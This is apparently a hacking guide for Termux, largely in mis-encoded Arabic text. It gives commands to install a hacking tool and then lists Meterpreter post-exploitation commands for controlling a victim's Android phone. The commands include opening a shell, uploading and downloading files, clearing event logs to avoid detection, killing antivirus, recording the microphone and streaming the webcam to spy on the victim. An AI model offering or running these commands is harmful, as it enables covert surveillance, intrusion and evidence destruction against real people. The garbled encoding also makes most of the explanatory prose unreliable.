$ apt update

$ apt upgrade

$ pkg install git

$ pkg install python2

$ git clone https://github.com/Ledear-Hacker/LEDEAR_HACKING
cd LEDEAR_HACKING 

$ python2 ledearhacking.py



ุงูุง ุจุนุฏ ุงูุงูุฑ ูุงุจุนุฏ ุงูุงุฎุชุฑุงู


ุงูุงูุฑ ุงูุชุญูู ูู ุงูุถุญูู ุจุนุฏ ุนูู ุฌูุณุฉ ุงูุชูุตุช ุนูู ุงูููุชุง ุณุจูููุชย


๐ง ูุฃุนุงุฏุฉ ุชุดุบูู ุฌูุงุฒ ุงูุถุญูุฉ : rebootย


๐ง ูุงุทูุงุก ุฌูุงุฒ ุงูุถุญูุฉ : shutdownย


๐ง ูุงุธูุงุฑ ูุนูููุงุช ุญูู ูุถุงู ุงูุถุญูุฉ ูุซู ูุถุงู ุชุดุบูู ู ูุบุฉย : sysinfoย


๐งููุงุชูุงุท ุตูุฑุฉ ูู ุดุงุดุฉ ุงูุถุญูุฉ : screenshotย


๐ง ูุงุธูุงุฑ ุงุชุตูุงุช ุงูุดุจูุฉ ูุฌููุน ุงูุจุฑุงูุฌ ู ุงููููุงุช ุงููุชุตูุฉ ุจุงูุงูุชุฑูุช ู ูุณุชูููุฉ ููุงูุชุฑูุช : netstatย


๐ง ููุฏุฎูู ุงูู ุงููููุงุช ุงูุฏุงุฎููู ู ูุชุงุจุฉ ุงูุงูุงูุฑ ูุฃูู ูู ุฌูุงุฒ ุงูุถุญูุฉ : shellย


๐ง ุงููุงููุงุน ุงู ุจุฑูุงูุฌ ุนูู ุฌูุงุฒ ุงูุถุญูุฉ ุจุงูุฑ ูุงุญุฏ ููู :ย execute -f mc.apkย

ุทุจุนุง ุบูุฑ mc ุงูู ุงุณู ุงูุจุฑูุงูุฌ ุงูุฐู ุชุฑูุฏู ุงู ูุดุชุบู


๐ง ูุงุธูุงุฑ ุฌููุน ุงูุจุฑุงูุฌ ุงูุชู ุชุดุชุบู ูู ุฌูุงุฒ ุงูุถุญูุฉ ุงูุชุจ : ps


๐ง ูุฑูุน ุงู ููู ูู ุนูุฏู ุงูู ุฌูุงุฒ ุงูุถุญูุฉ ูุซุงู :ย

upload /sdcard/doda.apk \doda.apk

ุงุณุชุจุฏู doda ุจุงุณู ุงูููู ุงู ุงูุชุทุจูู ุงู ุงู ุดุฆ ุชุฑูุฏ ุฑูุนูย

ุทุจุนุง ูุฐุง ุจุนุฏ ุงูุฏุฎูู ุงูู ููุงู ุงูุชุทุจูู ุงู ุงูุตูุฑู ุงู ุงู ุดุฆ ูุทุจุนุง ูุฏุฎูู ุงููู ูููุงุช ุงูุถุญูู ุงุทูุจ ุงูุงูุฑ

cd /sdcard


๐ง ูุชุญููู ุงู ููู ุงู ุตูุฑุฉ ูู ุฌูุงุฒ ุงูุถุญูุฉ ุงูู ุฌูุงุฒู :  doda.apk

ุบูุฑ doda ุงูู ุงุณู ุงูููู ู ุงูุถุง ุตูุบุฉ apk ุงูู ุตูุบุฉ ุงูููู ุทุจุนุง ูุฐุง ุจุนุฏ ุงูุฏุฎูู ุงูู ููุงู ุงูุชุทุจูู ุงู ุงูุตูุฑู ุงู ุงู ุดุฆ ูุทุจุนุง ูุฏุฎูู ุงููู ูููุงุช ุงูุถุญูู ุงุทูุจ ุงูุงูุฑ

cd /sdcard


ุงูุงูุฑ ูููู :


๐ง ุจุนุฏ ุฏุฎููู ูุจุงุดุฑ ุนูู ุงูุถุญูู

ยcd /sdcard

sdcard ูุฐุง ููุงู ุงูุฐุงูุฑู ุงูุฏุงุฎููู

ุงูุง ุงุฐุง ุทูุจุช cd /sdcard1

sdcard1 ูุฐุง ููุงู ุงูุฐุงูุฑู ุงูุฎุงุฑุฌูู

ุงูุง ูุนูู cd

ูุฐุง ุงูุงูุฑ ููุชููู ุจูู ุงููููุงุชย cdย

ููููู ุงู ุชูุชุจย .. cdย ููุฑุฌูุน ุงูู ุงููุฑุงุก

ูุงูุถุง ููุฏุฎูู ูููู cd file ููุฐูุงุจ ู ุชููู ุงูู ููู ุงุฎุฑย

ูู ุจุงุณุชุจุฏุงู file ุจ ุงุณู ุงูููู ุงูุฐู ุชุฑูุฏ ุฐูุงุจ ุงููู

ุงูุง ูุฐุง ุงูุงูุฑ pwd ูุฐุง ูุจูู ูู ุงุณู ุงูููุงู ุงูุฐู ุชุชูุงุฌุฏ ุจู ูู ุงูุจุฏุงูู ููููุงูู

ูุซุงู ...\...\...\...\...\

ูุงูุถุง ูุฐุง ุงูุงูุฑ ls ูุธูุฑ ูู ุงููููุงุช ุงูููุฌูุฏุฉ ู ุงูู ุงูุช

ูุงูุถุง Ctrl+l ูุฐุง ููุณุญ ุงูููุงู ุงูุฐู ูุชูุงุฌุฏ ูู ุงูุดุงุดู


๐ง ูุฐุง ุงูุงูุฑ ูุญุฐู ุงู ููู : rm dodaย

ูู ุจุงุณุชุจุฏุงู doda ุงูู ุงูููู ุงู ุจุฑูุงูุฌ ุงู ุตูุฑุฉ ุงูุฐู ุชุฑูุฏ ุงู ุชุญุฐููุงย

ยย

๐ง ูุงุบูุงู ุงูุฌูุณุฉ ุงูุงุฎุชุฑุงู ููุชุฑุฉ ูุนููุฉ ูู ุงูุฒูู ุทุจุนุง ูุฐุง ููู ุญุชู ูุง ูุดู ุงูุถุญูุฉ : sleep 5ย

ุบูุฑ 5 ุงูู ุนุฏุฏ ุงูุซูุงูู ุงูุชู ุชุญุจ ูููุง ุบูู ุฌูุณุฉ ุงูุงุฎุชุฑุงู ููููู ูุถุน ุณุงุนุฉ ุนู ุทุฑูู ูุชุงุจุฉ 3600ย

3600 ุชุงููุฉ = ุณุงุนุฉ ู ููุฐุง


๐ง ููุณุญ ุณุฌู ุงูุงุญุฏุงุช ู ุงูุงุฎุชุฑุงู (ุชููุฏ ูู ุงูุญูุงูุฉ) : clearevย


๐ง ูุฐุง ุงูุงูุฑ ูููุฏ ุฌุฏุง ุฏูุฑู ุชุนุทูู ุฌููุน ูุถุงุฏุงุช ุงูููุฑูุณุงุช ูู ุฌูุงุฒ ุงูุถุญูุฉ : run killav.rbย


๐ง ููุชุฌุณุณ ุนูู ูุงูู micย ุงูุฎุงุต ุจุงูุถุญูุฉ ู ุณูุงุน ูู ูุง ููููู ุงูุถุญูุฉ ู ูู ูุง ุตูุช ูู ุบุฑูุชู : record_mic -d 5ย

ุบูุฑ 5 ุงููย ุนุฏุฏ ุงููุซูุงูู ุงูุฐู ุชุฑูุฏ ุชุณุฌูู ุงูุตูุช ูููุง ูุชูุง 60 ูุณุฌู ูู ูุง ููููู ุงูุถุญูุฉ ููุฏุฉ ุฏูููุฉย

ุทุจุนุง ุงูุฒูู ุจุงูุชุงููุฉ s


๐ง ูุงูุชูุงุท ุตูุฑุฉ ูู ูุงููุฑุง ุงูุฌูุงุฒ : webcam_snap


๐ง ููุดุงูุฏุฉ ูู ูุง ููุนูู ุงูุถุญูุฉ ูู ุงููุงููุฑุง ุงู ุงูุชุฌุณุณ ุนูู ุงููุงููุฑุง :ย

webcam_stream -d 60ย

ุบูุฑ 60 ุงูู ุนุฏุฏ ุงูุซูุงูู ุงูุชู ุชุณุฌู ููู ุงููุงููุฑุงย

ููููู ูุถุน 3600 ุญูุช ูุณุฌู ูู ูุง ููุนูู ุงูุถุญูุฉ ููุฏุฉ ุณุงุนุฉย

ู ุงูุถุง ุณููุชุญ ุตูุญุฉ ูู ูุชุตูุญู ูุฑุคูุฉ ูู ูุง ููุนููย


๐ง ูุนูููู ูููู ุงุฐุง ุญููุช ุงู ุดุฆ ูู ุนูุฏ ุงูุถุญูู ุณูููู ูุชูุงุฌุฏ ูู ููู ุงุฏุงู metasploit ุงูุฐู ูุชูุงุฌุฏ ูู termux ูููููู ููู ูู ุดุฆ ููุช ุจุชุญูููู ูู ููู metasploit ุงูู ุงูุฐุงูุฑู ุงูุฏุงุฎููู ุงูุฎุงุตู ุจู ุจูุฐุง ุงูุงูุฑ :ย

mv doda /sdcard

ุบูุฑ ุงุณู doda ุจุงุณู ุงูููู ุงู ุงูุจุฑูุงูุฌ ุงู ุงูุตูุฑู ุงู ุงู ุดุฆ ููุช ุจุชุญูููู

ุงูุฑ ุงุธูุงุฑ id 

ifconfig

ุชูุฒูู ุงูุตูุฑ

CD - a * / sdcard

ุงูุฏุฎูู ุงูู ุงูุตูุฑ
cd DCIM

android 7x
